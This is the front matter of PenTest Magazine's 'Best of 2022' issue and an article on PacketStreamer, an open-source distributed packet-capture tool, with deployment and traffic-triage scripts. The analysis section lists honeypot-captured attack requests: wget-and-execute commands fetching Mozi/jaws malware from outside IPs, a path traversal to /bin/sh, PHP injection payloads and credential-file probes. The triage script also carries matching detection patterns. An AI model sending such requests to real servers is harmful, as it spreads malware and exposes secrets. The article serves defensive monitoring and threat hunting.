
EDITORIAL TEAM

Managing Editors: Bartłomiej Adach (bartek.adach@pentestmag.com), Bruno Zwierz (bruno.zwierz@pentestmag.com)

Proofreaders & Betatesters: Amit Chugh, Da Co, David Michaud, Diane Barrett, Gabriel Carvalhaes, Hammad Arshed, Jaimandeep Singh, Jordan M. Bonagura, Matthew Sabin, Nasreddine Bencherchali, Paul Mellen, Pradeep Mishra, Serge Laoun, Tom Updegrove

Special thanks to the Proofreaders & Betatesters who helped with this issue. Without their assistance there would not be a PenTest Magazine.

Senior Consultant/Publisher: Paweł Marciniak

CEO: Joanna Kretowicz (joanna.kretowicz@pentestmag.com)

DTP: Bruno Zwierz (bruno.zwierz@pentestmag.com)

COVER DESIGN: Hiep Nguyen Duc

PUBLISHER: Hakin9 Media Sp. z o.o., ul. Postępu 17D, 02-676 Warszawa
Phone: 1 917 338 3631
www.pentestmag.com

All trademarks, trade names, or logos mentioned or used are the property of their respective owners.

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility
for misuse of the presented techniques or consequent data loss.

Dear PenTest Readers,

We would like to present you with a special edition, composed of the highlights of the articles
published in our monthly magazine issues in 2022. If you’re looking for the synthesis of the write-ups
that received the best reviews among our readers - here it is!

In “Best of 2022” you will read top-notch articles on the most relevant topics of the recent months.
All of this practical knowledge, presented by experts in their areas, will still be very helpful in 2023.

Inside you will read about Android Pentesting, Windows Privilege Escalation, WiFi Pentesting tools,
internal penetration tests, online games vulnerabilities, cloud security, OT/ICS cybersecurity monitoring,
and much more!

This is certainly a condensed compendium of practical cybersecurity tools, techniques, tips, and tricks.
Covering a really wide range of topics, it has a real treat in store for every reader.

Without further ado,

Enjoy the content!

PenTest Magazine’s Editorial Team

Contents

Android Application Pentest, by Gabrielle Botbol
ETW vs Sysmon Against C2 Servers, by Damon Mohammedbeger
WiFi Pentesting with Airodump-ng, by Juan Morales
Understanding Office Trusted Locations Workflow and How It Can be Exploited, by Adam Maraziti
Play to Earn or Insecure to Play?, by Marlon Fabiano
Cybersecurity Compliance on Cloud, by Almu Gómez Sánchez-Paulete
Wide-area Packet Capture with PacketStreamer, by Owen Garrett
Building Intuition into Monitoring for OT/ICS Security, by Danielle Jablanski
Windows Privilege Escalation: The Concepts of Hijacking Execution Flow, by Jill Kamperides
Introduction to Internal Penetration Tests, by Dimitris Pallis
Wide-area Packet Capture with PacketStreamer

Owen Garrett, Deepfence
Owen is a software engineer and product manager, and leads products and community at Deepfence Inc, an open-source security observability provider. At Deepfence, Owen is driving the creation of a set of open source “Security Observability” platform tools. PacketStreamer and SecretScanner are quick and effective tools, and ThreatMapper is a broader security platform for security professionals to find weaknesses in their production applications. Prior to Deepfence, Owen led products at NGINX. During that time, NGINX grew to be one of the most widely-deployed open source projects, securing over 500m websites and forming the core of countless ecosystem projects.

Owen lives in Cambridge, UK, and can be found at https://www.linkedin.com/in/owengarrett/

PacketStreamer is an open source project from Deepfence. It performs distributed packet capture (tcpdump-like) and aggregates the pcap data in a single pcap file. PacketStreamer supports a wide range of environments, including Kubernetes nodes, Docker hosts, Fargate instances and, of course, virtual and bare-metal servers.

[Figure: PacketStreamer performs distributed packet capture and central aggregation]


Network packet capture is a well understood practice. The basic technology that modern tools are built on first
appeared in a tool named ‘tcpdump’, released in 1988, and the associated file format (pcap) has stood the test
of time.

Although the technology has changed little, modern compute environments are very different from the single-
Unix-server assumptions that defined the design of tcpdump. Modern environments are cloud-based,
distributed across many servers, and use virtualization technologies that make it difficult to run kernel tools
such as tcpdump directly.

PacketStreamer applies contemporary network capture to modern, cloud-native environments. It captures traffic from large numbers of remote servers (for example, cloud nodes) and collects that traffic in one place. It supports modern stacks, such as Kubernetes (via a daemonset), Docker, and AWS Fargate, as well as standard hosts.

Use PacketStreamer if you need a lightweight, efficient method to collect raw network data from multiple
machines for central logging and analysis:

• Debugging: intermittent errors are happening and your log files don’t reveal enough details. You need to
gather network traffic to see what requests your servers are processing.

• Forensics: you want to capture traffic to sensitive services for storage and later inspection in the event of an
investigation.

• Threat hunting: you want to identify any unusual behavior that may indicate the presence of adversaries.

• Machine learning: you need to capture large volumes of network traffic from many production servers to train
machine learning engines to recognize normal and anomalous traffic.

Getting Started with PacketStreamer

We’ll share a walkthrough of building, installing and running PacketStreamer, and see what we find.

We’ll start with four cloud servers. Three are honeypot servers, running WordPress, a simple NGINX hello-world,
and honeydb.io. The fourth will be our receiver server where we aggregate and analyze the packet data.

Build PacketStreamer

On the build (receiver) server, let’s clone the source and build PacketStreamer. It’s a standalone Golang app,
and we’ll statically-link the build to make it as portable as possible:

# install the necessary build tools (Debian/Ubuntu; other OSs will differ)
sudo apt install -y build-essential golang-go libpcap-dev

# Get the source (github) and build a statically-linked binary
git clone https://github.com/deepfence/PacketStreamer.git
cd PacketStreamer/
make STATIC=1

# verify we have a statically-linked binary
file packetstreamer
packetstreamer: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, not stripped

Deploy the receiver

In one terminal on the receiver server, let’s start the PacketStreamer receiver process and pipe the pcap output
into tshark. We can use the included receiver-stdout.yaml configuration file, which configures the receiver to
accept traffic on port 8081:

./packetstreamer receiver \
    --config ./contrib/config/receiver-stdout.yaml | tshark -r - -Y http

The PacketStreamer receiver process will run quietly, waiting for connections from remote PacketStreamer
sensors. Pcap output from PacketStreamer will be piped to the tshark tool.

You could instead write the output to a file for later analysis, or even tee it to a file while watching using tshark.
That way, you can quickly spot anomalies (tshark output) and investigate the full packet dump.

Deploy the sensors

Now, let’s deploy the sensors on each of our target servers. We first need to create a simple configuration file
sensor-remote.yaml that identifies the location of the remote receiver:

output:
  server:
    address: 12.34.56.78
    port: 8081
pcapMode: all

Copy the PacketStreamer binary and the sensor-remote.yaml configuration file to each of the target servers:

scp packetstreamer sensor-remote.yaml user@wordpress:/tmp
scp packetstreamer sensor-remote.yaml user@nginx:/tmp
scp packetstreamer sensor-remote.yaml user@honeypot:/tmp

Then run the sensors on the remote machines:

ssh root@wordpress
# as root on the target machine:
/tmp/packetstreamer sensor --config /tmp/sensor-remote.yaml

Repeat for the nginx and honeypot machines.
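The steps above (write the sensor config, copy it with the binary to each host, start the sensors, and run the receiver) can be scripted so that the raw pcap is kept on disk while tshark shows live HTTP traffic, as the text suggests. The script below is an added example, not part of the PacketStreamer project; the receiver address and port, the host list, the `/tmp` paths and the `sudo` assumption are placeholders taken from the walkthrough. The YAML layout follows the `sensor-remote.yaml` shown above.

```shell
#!/bin/sh
# Added example (not PacketStreamer's own tooling): fan out the sensor
# deployment and run the receiver with the pcap stream saved to a file.
# Receiver address/port, host list and paths are placeholders.
set -eu

RECEIVER_ADDR="12.34.56.78"
RECEIVER_PORT="8081"
# user@host targets; 'user' is assumed to be able to sudo on each host
SENSOR_HOSTS="user@wordpress user@nginx user@honeypot"

# Write a sensor-remote.yaml that points at the receiver.
# $1 = receiver address, $2 = receiver port, $3 = output path
make_sensor_config() {
    cat > "$3" <<EOF
output:
  server:
    address: $1
    port: $2
pcapMode: all
EOF
}

# Copy the binary and config to one host and start the sensor in the
# background as root, logging to /tmp/packetstreamer.log on that host.
# $1 = user@host
deploy_sensor() {
    scp packetstreamer sensor-remote.yaml "$1:/tmp/"
    ssh "$1" 'sudo nohup /tmp/packetstreamer sensor --config /tmp/sensor-remote.yaml >/tmp/packetstreamer.log 2>&1 &'
}

# Run the receiver: tee the full pcap stream to $1 for later analysis
# while tshark prints only HTTP requests to the terminal.
run_receiver() {
    ./packetstreamer receiver --config ./contrib/config/receiver-stdout.yaml \
        | tee "$1" \
        | tshark -r - -Y http
}

# Usage:  ./deploy.sh deploy     (on the build host, after 'make STATIC=1')
#         ./deploy.sh receive    (on the receiver host)
case "${1:-}" in
    deploy)
        make_sensor_config "$RECEIVER_ADDR" "$RECEIVER_PORT" sensor-remote.yaml
        for h in $SENSOR_HOSTS; do
            deploy_sensor "$h"
        done
        ;;
    receive)
        run_receiver "capture-$(date +%Y%m%d-%H%M%S).pcap"
        ;;
esac
```

Keeping the tee'd pcap next to the tshark view means an anomaly spotted on the terminal can be pulled up with full packet detail afterwards, without re-running the capture.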

Analyzing the results

We ran the sensors and receivers for 24 hours, looking for interesting HTTP requests (tshark -Y http) to the
target servers. We saw hundreds of drive-by attempts from dozens of different IP addresses, trying to find
unprotected secrets, find vulnerable control panel components, use injection to install malware, etc.

Requests ranged from an innocuous-looking ‘GET http://example.com/’ to much more significant attempts; a small selection of the captured traffic is listed below (IP addresses obfuscated):

HTTP 295 GET /.env HTTP/1.1
HTTP 307 GET /.aws/credentials HTTP/1.1
HTTP 86 POST /.aws/credentials HTTP/1.1 (application/x-www-form-urlencoded)
HTTP 599 POST /boaform/admin/formLogin HTTP/1.1 (application/x-www-form-urlencoded)
HTTP 335 GET /_ignition/execute-solution HTTP/1.1
HTTP 292 GET //robots.txt HTTP/1.1
HTTP 306 GET //.well-known/security.txt HTTP/1.1
HTTP 293 GET //sitemap.xml HTTP/1.1
HTTP 176 GET http://example.com/ HTTP/1.1
HTTP 796 GET /Rh-aD.nSuH_ HTTP/1.1
HTTP 941 GET /yTHlRfsRgMPOmMR2kd4Hc765I/mC/mqqE3ohONMZfZP0WUJFGFSGhlX/j1?KAwuc=ymn5Jdu96Iip_MOYa9.dTr3U7Yc&wpaCkwFkjcIU=0llrN&E0LYUK=cn.X2DT4AKByeQVWUK-gOED5Vk HTTP/1.1
HTTP 416 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 (application/x-www-form-urlencoded)
HTTP 86 POST /assets/images/get.php HTTP/1.1 (application/x-www-form-urlencoded)
HTTP 573 GET /dup-installer/main.installer.php HTTP/1.1
HTTP 296 GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.19/jaws;sh+/tmp/jaws HTTP/1.1
HTTP 302 GET /actuator/gateway/routes HTTP/1.1
HTTP 336 GET /shell?cd+/tmp;rm+-rf+*;wget+http://13.25.90.45:34416/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
HTTP 302 GET /.git/config HTTP/1.1
HTTP 86 POST /assets/images/go.php HTTP/1.1 (application/x-www-form-urlencoded)
HTTP 378 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
HTTP 506 POST /cgi-bin/ViewLog.asp HTTP/1.1 (application/x-www-form-urlencoded)Continuation
HTTP 385 POST /GponForm/diag_Form?images/ HTTP/1.1
HTTP/XML 673 POST /Autodiscover/Autodiscover.xml HTTP/1.1
HTTP 307 GET /solr/admin/info/system?wt=json HTTP/1.1
HTTP 320 CONNECT 46.38.62.96:443 HTTP/1.1
HTTP 327 CONNECT t2.proxy-checks.com:443 HTTP/1.0
HTTP 391 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
HTTP 363 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
HTTP 307 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
HTTP 191 GET /manager/text/list HTTP/1.1
HTTP 418 GET /config/getuser?index=0 HTTP/1.1

You can store the results locally in a pcap file for more detailed, later analysis, or (feature in development) write
them to an S3 bucket. You can analyze them using any tool that can process pcap data.
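A listing like the one above is easier to act on once each request is sorted into a category (credential-file probes, command injection, traversal, exposed management interfaces, open-proxy checks). The script below is an added example, not part of PacketStreamer or tshark: it reads tshark summary lines in the reduced "PROTO LENGTH REQUEST" layout shown above and tags each line with a category using a small hand-written pattern set drawn from that listing (not a complete signature base). The sample lines are constructed for the example; their addresses come from RFC 5737 documentation ranges.

```shell
#!/bin/sh
# Added example (not part of PacketStreamer or tshark): first-pass triage of
# tshark HTTP summary lines. Patterns below are a small illustrative set
# derived from the requests listed in the article, not a complete rule base.
set -eu

# Read request lines on stdin; print "<category><TAB><original line>" per line.
triage_http() {
    awk '
    {
        l = tolower($0)
        cat = "other"
        # shell commands smuggled into the URL, or PHP eval probes
        if (l ~ /\/shell\?|wget\+|;sh\+|chmod\+777|eval-stdin\.php|call_user_func_array|die\(@md5/)
            cat = "command-injection"
        # files that leak credentials or source
        else if (l ~ /\/\.env|\/\.aws\/credentials|\/\.git\/config|\/config\/getuser/)
            cat = "secret-probe"
        # encoded or plain ../ sequences
        else if (l ~ /\.%2e\/|\.\.\//)
            cat = "path-traversal"
        # management consoles and debug endpoints that should not be exposed
        else if (l ~ /\/manager\/text\/list|\/actuator\/|\/solr\/admin|\/_ignition\/|\/dup-installer\/|xdebug_session_start/)
            cat = "admin-interface-probe"
        # CONNECT requests test whether the host will act as an open proxy
        else if ($0 ~ /CONNECT /)
            cat = "open-proxy-check"
        print cat "\t" $0
    }'
}

# Per-category counts, most frequent first.
summarize() {
    triage_http | cut -f1 | sort | uniq -c | sort -rn
}

# Constructed sample input (addresses are RFC 5737 documentation ranges).
SAMPLE_REQUESTS='HTTP 295 GET /.env HTTP/1.1
HTTP 307 GET /.aws/credentials HTTP/1.1
HTTP 292 GET //robots.txt HTTP/1.1
HTTP 296 GET /shell?cd+/tmp;rm+-rf+*;wget+203.0.113.5/x;sh+/tmp/x HTTP/1.1
HTTP 416 POST /cgi-bin/.%2e/.%2e/bin/sh HTTP/1.1 (application/x-www-form-urlencoded)
HTTP 320 CONNECT 198.51.100.7:443 HTTP/1.1
HTTP 191 GET /manager/text/list HTTP/1.1
HTTP 176 GET http://example.com/ HTTP/1.1'

# Number of sample lines that fall into category $1.
count_category() {
    printf '%s\n' "$SAMPLE_REQUESTS" | triage_http \
        | awk -F'\t' -v c="$1" '$1 == c { n++ } END { print n + 0 }'
}

# Usage: run with "demo" for the sample data, or pipe live tshark output in:
#   ./packetstreamer receiver --config ./contrib/config/receiver-stdout.yaml \
#       | tshark -r - -Y http | summarize
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_REQUESTS" | summarize
fi
```

The categories are ordered so that a request carrying a shell command is reported as command injection even when it also traverses directories; the order of the branches is the only prioritisation, so new patterns go into the branch whose severity they match.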

Conclusion

PacketStreamer was developed by Deepfence as part of a bigger observability and security analytics product.
We’ve open-sourced it because, to the best of our knowledge, there are no existing tools that capture and
merge multiple pcap streams, and function across Kubernetes, Docker, Fargate and operating system
environments.

We’d welcome any feedback, contributions and suggestions. Please start with the PacketStreamer GitHub
repository, and feel welcome to join the Deepfence Community Slack.
